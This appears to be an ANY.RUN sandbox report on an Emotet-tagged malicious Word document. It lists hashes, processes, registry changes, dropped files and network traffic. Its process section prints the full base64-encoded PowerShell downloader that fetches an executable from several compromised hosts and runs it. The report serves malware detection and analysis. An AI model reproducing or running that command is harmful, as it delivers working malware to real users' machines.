File name:

US1690230194492646444.doc

Full analysis: https://app.any.run/tasks/094c397b-77a2-455b-89a8-a09d4e12643d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: February 11, 2019, 06:56:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
opendir
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

ED673A2E62C0A7B4B4798FEE5C03740E

SHA1:

814AD77D20B5AC6A5F0915CCF647234BF85DDCFE

SHA256:

53B0784F219135BC4164DC3B89F39B421863E7282C50D1955B13DD559CFA3370

SSDEEP:

3072:fSTBCe6+NcSDZjgRtjvIOzdksMGA8zfI/oEQ9gjjRWjIkYqLjL/xSu90OoiLuDKm:f2N9IbIydQGAuYQGgjtzxUOmD+XfwL7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2560)

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2560)

    • Application was dropped or rewritten from another process

      • 776.exe (PID: 3060)
      • 776.exe (PID: 2056)
      • turnedavatar.exe (PID: 2724)
      • turnedavatar.exe (PID: 2660)

    • Emotet process was detected

      • turnedavatar.exe (PID: 2724)

    • Downloads executable files from the Internet

      • Powershell.exe (PID: 2888)

  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 2888)

    • Reads the machine GUID from the registry

      • Powershell.exe (PID: 2888)

    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 2888)
      • 776.exe (PID: 2056)

    • Application launched itself

      • 776.exe (PID: 3060)

    • Starts itself from another location

      • 776.exe (PID: 2056)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2560)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 2560)

    • Dropped object may contain Bitcoin addresses

      • Powershell.exe (PID: 2888)
      • 776.exe (PID: 2056)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2560)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:02:08 21:40:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:02:08 21:40:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 1
WordDocumentDocumentPropertiesCharacters: 12
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 12
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: UD6Cnwl
WordDocumentDocSuppDataBinData: (Binary data 135864 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentBodySectPRsidR: 008F337A
WordDocumentBodySectPRsidRDefault: 008F337A
WordDocumentBodySectPRRsidRPr: 002F49D9
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://H4DbuISpwPOIS
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://H4DbuISpwPOIS
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 776.exe no specs 776.exe #EMOTET turnedavatar.exe no specs turnedavatar.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2056"C:\Users\admin\776.exe"C:\Users\admin\776.exe
776.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\776.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2560"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\US1690230194492646444.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.5123.5000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2660"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exeturnedavatar.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\turnedavatar\turnedavatar.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2724"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe
776.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\turnedavatar\turnedavatar.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2888Powershell -e JABwAFoAQgBrAFgARwBuAD0AKAAnAHQAOQA1AG0AaAByACcAKwAnAFoARQAnACkAOwAkAFQAQgB3AEEATgBwAGoAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFQARwBIAGMAWAA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACcALwAvAGsAJwArACcAdQByAHoAYQBsAC4AcgAnACsAJwB1AC8AJwArACcAdwBvAHIAZAAnACsAJwBwAHIAZQBzACcAKwAnAHMALwB3ACcAKwAnAHAAJwArACcALQBjAG8AbgB0AGUAbgB0ACcAKwAnAC8AdQBwACcAKwAnAGwAbwAnACsAJwBhAGQAJwArACcAcwAvAGMAJwArACcAegB0ADcAJwArACcAWQBkAFQAaQAzAHIAJwArACcAWgBWACcAKwAnAF8AcABhADcAJwArACcAQABoAHQAdAAnACsAJwBwADoALwAvAGwAYQBiACcAKwAnAHQAZQAnACsAJwByAHAAYQBkAHUALgB1AGwAbQAnACsAJwAuAGEAYwAnACsAJwAuACcAKwAnAGkAZAAvADcAJwArACcANwBnACcAKwAnAEwAbAAnACsAJwA2AEgAJwArACcANgBxAFAAQABoAHQAdABwADoAJwArACcALwAnACsAJwAvAGQAdQBrAGUAbgAnACsAJwAuAGsAegAvAFMAJwArACcATwAnACsAJwBIACcAKwAnAE0AbABNAHYAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8AYwBvAG0AcABlAHgALQBvAG4AbABpAG4AZQAnACsAJwAuACcAKwAnAHIAJwArACcAdQAvADEAdgAzACcAKwAnAFAAJwArACcAcABQAEoAQQA2AEMAQABoAHQAJwArACcAdABwADoAJwArACcALwAvAG0AJwArACcAYQByAGsAZQAnACsAJwB0AGkAbgBnAG8AbgAnACsAJwBsAGkAJwArACcAbgBlAC4AdgBuAC8AdwBwACcAKwAnAC0AJwArACcAYQBkAG0AaQBuACcAKwAnAC8AUwBvAGoAYwAnACsAJwBsACcAKwAnAFkANwAnACsAJwBSAHMAbABhACcAKwAnAGIAJwArACcAbQBfACcAKwAnADQAMgAzAGwANgAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABTAEUARwBNAFQAbgBQAD0AKAAnAGIAJwArACcAZgBpAG4AJwArACcAWAA1AGkAMwAnACkAOwAkAHcAagBCAGsAbgBPACAAPQAgACgAJwA3ADcAJwArACcANgAnACkAOwAkAEkAcwBDAEoATwB3AGsAagA9ACgAJwBmACcAKwAnAGoATgB3AHQAWgAnACsAJwBxAE4AJwApADsAJABGAFEAVgBKADIARwB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGoAQgBrAG4ATwArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEYATQAzAGQAWQBSAFMAIABpAG4AIAAkAHoAVABHAEgAYwBYACkAewB0AHIAeQB7ACQAVABCAHcAQQBOAHAAagByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYATQAzAGQAWQBSAFMALAAgACQARgBRAFYASgAyAEcAdwApADsAJABHAHEAcwBrAEwAVABWAGoAPQAoACcAcQBuAEQAJwArACcAcgBRAG4AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARgBRAFYASgAyAEcAdwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAUQBWAEoAMgBHAHcAOwAkAHcAZgBEAHEAOQBHADUAMAA9ACgAJwBoAGYAegBwAEQARQBsACcAKwAnAGkAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHcANQBkAEQAMgBYADAAPQAoACcAYgBpACcAKwAnAEcAWAB0AE8ATgAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3060"C:\Users\admin\776.exe" C:\Users\admin\776.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\776.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
Total events
1 851
Read events
1 305
Write events
539
Delete events
7

Modification events

(PID) Process:(2560) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:6%&
Value:
36252600000A0000010000000000000000000000
(PID) Process:(2560) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2560) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2560) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1313538090
(PID) Process:(2560) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313538174
(PID) Process:(2560) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313538175
(PID) Process:(2560) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
000A00003A51C9E1D6C1D40100000000
(PID) Process:(2560) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:o)&
Value:
6F292600000A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2560) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:o)&
Value:
6F292600000A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2560) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
2
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFD96.tmp.cvr
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E2C9133.tmp
MD5:
SHA256:
2888Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HBOJRBYE7FKGSWIHEIJM.temp
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:
SHA256:
2888Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\US1690230194492646444.LNKlnk
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\Desktop\~$1690230194492646444.docpgc
MD5:
SHA256:
2888Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1c0eec.TMPbinary
MD5:
SHA256:
2888Powershell.exeC:\Users\admin\776.exeexecutable
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2888
Powershell.exe
GET
301
213.79.113.120:80
http://kurzal.ru/wordpress/wp-content/uploads/czt7YdTi3rZV_pa7
RU
html
271 b
suspicious
2888
Powershell.exe
GET
200
213.79.113.120:80
http://kurzal.ru/wordpress/wp-content/uploads/czt7YdTi3rZV_pa7/
RU
executable
359 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2888
Powershell.exe
213.79.113.120:80
kurzal.ru
OJSC Comcor
RU
suspicious

DNS requests

Domain
IP
Reputation
kurzal.ru
  • 213.79.113.120
suspicious

Threats

PID
Process
Class
Message
2888
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2888
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2888
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
US1690230194492646444.doc